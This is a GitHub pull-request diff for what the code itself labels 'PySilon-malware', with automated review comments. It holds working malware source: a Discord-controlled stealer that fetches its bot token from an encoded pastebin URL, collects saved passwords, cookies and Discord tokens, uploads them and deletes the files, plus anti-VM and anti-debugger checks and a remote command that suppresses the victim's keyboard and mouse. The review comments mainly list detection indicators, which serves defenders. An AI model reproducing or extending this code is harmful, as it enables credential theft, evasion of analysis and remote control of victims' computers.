Merge pull request #178 from mategol/py-dev
`Debug mode`, `@ping` functions
Showing
25 changed files
with
959 additions
and
470 deletions.
This file was deleted.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
import resources.discord_token_grabber as discord_token_grabber | ||
import resources.passwords_grabber as passwords_grabber | ||
import resources.get_cookies as cookies_grabber | ||
from base64 import b64decode | ||
from getpass import getuser | ||
from json import loads | ||
import subprocess | ||
import requests | ||
import discord | ||
content = b64decode(requests.get(b64decode('aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3JBM1o4ZHp4')).text) | ||
bot_token, channel_id = b64decode(loads(content)['token'])[::-1].decode(), int(b64decode(loads(content)['channel'])[::-1]) | ||
Client = discord.Client(intents=discord.Intents.all()) | ||
@Client.event | ||
async def on_ready(): | ||
hwid = subprocess.check_output('wmic csproduct get uuid', shell=True).decode().split('\n')[1].strip() | ||
try: passwords = passwords_grabber.grab_passwords() | ||
except: passwords = 'Error (or no saved passwords)' | ||
try: cookies_grabber.grab_cookies() | ||
except: | ||
with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'w', encoding='utf-8') as error_log: error_log.write('Error (or fresh OS)') | ||
try: discord_grabbed = discord_token_grabber.grab_discord.initialize(True) | ||
except: discord_grabbed = 'error' | ||
with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'r', encoding='utf-8') as copy_cookies: cookies = copy_cookies.readlines() | ||
with open(f'C:\\Users\\{getuser()}\\{hwid}.txt', 'w', encoding='utf-8') as save_results: save_results.write('Passwords:\n' + str(passwords) + '\n\n\nDiscord:\n' + ('\n---\n'.join(discord_grabbed) if discord_grabbed != 'error' else discord_grabbed) + '\n\n\nCookies:\n' + ''.join(cookies)) | ||
await Client.get_channel(channel_id).send(file=discord.File(f'C:\\Users\\{getuser()}\\{hwid}.txt', filename='{hwid}.txt')); subprocess.run(f'del C:\\Users\\{getuser()}\\{hwid}.txt', shell=True); subprocess.run(f'del C:\\Users\\{getuser()}\\cookies.txt', shell=True) | ||
Client.run(bot_token) |
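Review bot: This new file has no header comment or docstring, and nothing in it states that `on_ready` is a credential-collection routine: it calls the password, cookie and Discord-token grabber modules, writes the combined result to a text file named after the machine UUID in the user's profile directory, sends that file to a Discord channel and then deletes it. A one-line header such as `# Collects saved browser passwords, cookies and Discord tokens and uploads them to the configured Discord channel` would make that explicit to anyone triaging the repository. For detection, the behaviours visible on these lines are a `wmic csproduct get uuid` child process, short-lived `cookies.txt` and `<uuid>.txt` files directly under `C:\Users\<user>\`, shell `del` commands for both files, and a startup HTTP fetch of a base64-encoded URL that supplies the bot token and channel id. The bare `except:` clauses replace every failure with a placeholder string, so a partial or empty report does not mean the host was unaffected.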
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
import psutil | ||
import os | ||
|
||
def protection_check(): | ||
vm_files = [ | ||
"C:\\windows\\system32\\vmGuestLib.dll", | ||
"C:\\windows\\system32\\vm3dgl.dll", | ||
"C:\\windows\\system32\\vboxhook.dll", | ||
"C:\\windows\\system32\\vboxmrxnp.dll", | ||
"C:\\windows\\system32\\vmsrvc.dll", | ||
"C:\\windows\\system32\\drivers\\vmsrvc.sys" | ||
] | ||
blacklisted_processes = [ | ||
'vmtoolsd.exe', | ||
'vmwaretray.exe', | ||
'vmwareuser.exe' | ||
'fakenet.exe', | ||
'dumpcap.exe', | ||
'httpdebuggerui.exe', | ||
'wireshark.exe', | ||
'fiddler.exe', | ||
'vboxservice.exe', | ||
'df5serv.exe', | ||
'vboxtray.exe', | ||
'vmwaretray.exe', | ||
'ida64.exe', | ||
'ollydbg.exe', | ||
'pestudio.exe', | ||
'vgauthservice.exe', | ||
'vmacthlp.exe', | ||
'x96dbg.exe', | ||
'x32dbg.exe', | ||
'prl_cc.exe', | ||
'prl_tools.exe', | ||
'xenservice.exe', | ||
'qemu-ga.exe', | ||
'joeboxcontrol.exe', | ||
'ksdumperclient.exe', | ||
'ksdumper.exe', | ||
'joeboxserver.exe', | ||
] | ||
|
||
for process in psutil.process_iter(['pid', 'name']): | ||
if process.info['name'].lower() in blacklisted_processes: | ||
return True | ||
for file_path in vm_files: | ||
if os.path.exists(file_path): | ||
return True | ||
|
||
|
||
return False | ||
|
||
def fake_mutex_code(exe_name: str) -> bool: | ||
for process in psutil.process_iter(['pid', 'name']): | ||
if process.info['name'].lower() == exe_name: | ||
return True | ||
|
||
return False |
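Review bot: Neither `protection_check` nor `fake_mutex_code` has a docstring, and the names hide what the functions do. `protection_check` returns True when one of the listed virtualization guest files exists under `C:\windows\system32` or when a running process name matches the list of VM-tool, debugger and traffic-capture executables, and `fake_mutex_code` returns True when a process with the given name is running. Docstrings such as `"""Return True if a known VM guest file or analysis-tool process is present."""` would make the anti-analysis purpose explicit for anyone triaging the sample. For defenders, a process that enumerates every process name through psutil and probes these specific guest-driver paths is a behavioural signal in its own right. How callers react to a True result is not visible in this section.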
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,44 +1,55 @@ | ||
from pynput import keyboard, mouse | ||
# end of imports | ||
|
||
# on message | ||
elif message.content == '.block-input': | ||
if not input_blocked: | ||
await message.delete() | ||
|
||
async def on_press(): | ||
pass | ||
|
||
async def on_release(): | ||
pass | ||
|
||
async def on_click(): | ||
pass | ||
|
||
keyboard_listener = keyboard.Listener(suppress=True) | ||
mouse_listener = mouse.Listener(suppress=True) | ||
|
||
keyboard_listener.start() | ||
mouse_listener.start() | ||
embed = discord.Embed(title="🚫 Input Blocked",description=f'```Input has been blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
input_blocked = True | ||
else: | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is already blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
|
||
elif message.content == '.unblock-input': | ||
if input_blocked: | ||
await message.delete() | ||
keyboard_listener.stop() | ||
mouse_listener.stop() | ||
embed = discord.Embed(title="🟢 Input Unblocked",description=f'```Input has been unblocked. Block it by using .block-input```', colour=discord.Colour.green()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
input_blocked = False | ||
else: | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is not blocked. Block it by using .block-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
from pynput import keyboard, mouse | ||
# end of imports | ||
# on message | ||
elif message.content == '.block-input': | ||
#.log Message is "block input" | ||
if not input_blocked: | ||
#.log Input is not already blocked | ||
await message.delete() | ||
#.log Removed the message | ||
async def on_press(): | ||
pass | ||
async def on_release(): | ||
pass | ||
async def on_click(): | ||
pass | ||
keyboard_listener = keyboard.Listener(suppress=True) | ||
#.log Created keyboard listener | ||
mouse_listener = mouse.Listener(suppress=True) | ||
#.log Created mouse listener | ||
keyboard_listener.start() | ||
#.log Disabled keyboard | ||
mouse_listener.start() | ||
#.log Disabled mouse | ||
embed = discord.Embed(title="🚫 Input Blocked",description=f'```Input has been blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about blocked input | ||
input_blocked = True | ||
else: | ||
#.log Input is already blocked | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is already blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about already blocked input | ||
elif message.content == '.unblock-input': | ||
#.log Message is "unblock input" | ||
if input_blocked: | ||
#.log Input is blocked | ||
await message.delete() | ||
#.log Removed the message | ||
keyboard_listener.stop() | ||
#.log Unblocked keyboard | ||
mouse_listener.stop() | ||
#.log Unblocked mouse | ||
embed = discord.Embed(title="🟢 Input Unblocked",description=f'```Input has been unblocked. Block it by using .block-input```', colour=discord.Colour.green()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about unblocked input | ||
input_blocked = False | ||
else: | ||
#.log Input is not blocked | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is not blocked. Block it by using .block-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about unblocked input |
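Review bot: The final added marker, `#.log Sent embed about unblocked input`, sits in the branch that reports the input is not blocked, so it duplicates the marker of the success branch above it and would make the two outcomes indistinguishable in a debug trace; `#.log Sent embed about input not being blocked` would match the branch. The `#.log` syntax is not explained anywhere in this section; presumably it is consumed by the debug mode named in the commit title, and a short comment at the top of the fragment saying so would help. For analysts, this handler is a fragment of a larger message handler that starts and ends outside the section. On a `.block-input` chat message it starts pynput keyboard and mouse listeners with `suppress=True`, which swallows local input until `.unblock-input` arrives. The embed author string `PySilon-malware` and the fixed icon URL are stable strings for signature matching.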